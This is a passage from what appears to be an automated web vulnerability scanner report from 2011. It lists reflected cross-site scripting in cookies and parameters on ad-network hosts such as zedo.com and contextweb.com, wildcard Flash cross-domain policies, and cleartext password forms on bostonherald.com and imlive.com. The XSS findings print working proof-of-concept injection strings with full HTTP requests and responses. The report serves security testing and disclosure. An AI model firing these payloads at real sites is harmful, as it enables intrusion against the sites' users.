Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:49 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=107
Expires: Sat, 29 Jan 2011 02:04:36 GMT
Date: Sat, 29 Jan 2011 02:02:49 GMT
Connection: close
Content-Length: 2517

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104
...[SNIP]...

4.1043. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9a4"-alert(1)-"4d1fa70ea4e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=162
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:39 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...

var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1044. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22348'%3balert(1)//7865b00c16b was submitted in the V cookie. This input was echoed as 22348';alert(1)//7865b00c16b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2123
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:50 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:51 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:51 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=gFEcJzqCjXJj22348';alert(1)//7865b00c16b" height="1" width="1" />
...[SNIP]...

4.1045. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1626'-alert(1)-'2bc9ddafdc1 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9e1626'-alert(1)-'2bc9ddafdc1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2187
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:52 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:52 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:52 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,513102,,,TOT09,RCQU1,RCQU9e1626'-alert(1)-'2bc9ddafdc1,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

4.1046. http://xads.zedo.com/ads2/c [a parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 was submitted in the a parameter. This input was echoed as 6efd3"style="x:expression(alert(1))"d0649ea4848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:34 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848
Vary: Accept-Encoding
Content-Length: 449
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848">
...[SNIP]...

4.1047. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98a1b"style="x:expression(alert(1))"1924c3dd077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077=1 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:36 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style="x:expression(alert(1))"1924c3dd077=1
Vary: Accept-Encoding
Content-Length: 456
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style="x:expression(alert(1))"1924c3dd077=1">
...[SNIP]...

5. Flash cross-domain policy previous next
There are 2 instances of this issue:

http://ad.afy11.net/crossdomain.xml
https://tt3.zedo.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 16:39:29 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.2. https://tt3.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://tt3.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "24a6846-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86400
Date: Sat, 29 Jan 2011 01:41:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6. Cleartext submission of password previous next
There are 61 instances of this issue:

http://ar.imlive.com/
http://bostonherald.com/track/inside_track/view.bg
http://bostonherald.com/track/star_tracks/view.bg
http://bostonherald.com/users/login
http://bostonherald.com/users/register/
http://br.imlive.com/
http://cafr.imlive.com/
http://de.imlive.com/
http://digg.com/submit
http://dk.imlive.com/
http://es.imlive.com/
http://fr.imlive.com/
http://gr.imlive.com/
http://imlive.com/
http://imlive.com/homepagems3.asp
http://imlive.com/webcam-login/
http://in.imlive.com/
http://it.imlive.com/
http://jp.imlive.com/
http://mx.imlive.com/
http://nl.imlive.com/
http://no.imlive.com/
http://pu.imlive.com/
http://ru.imlive.com/
http://se.imlive.com/
http://support.moxiesoft.com/
http://tr.imlive.com/
http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6
http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also
http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7
http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3
http://www.bostonherald.com/users/register
http://www.bostonherald.com/users/register/
http://www.paperg.com/
http://www.parker-software.com/forum/
http://www.parkersoft.co.uk/client.aspx
http://www.screenthumbs.com/
http://www.screenthumbs.com/about
http://www.screenthumbs.com/contact
http://www.screenthumbs.com/forgot
http://www.screenthumbs.com/linkthumbs
http://www.screenthumbs.com/plugins
http://www.screenthumbs.com/service
http://www.screenthumbs.com/signup
http://www.screenthumbs.com/signup.php
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://ar.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://ar.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
Set-Cookie: spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:42 GMT
Connection: close
Content-Length: 18354
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.2. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2

The form contains the following password fields:

password
confirm_password

Request

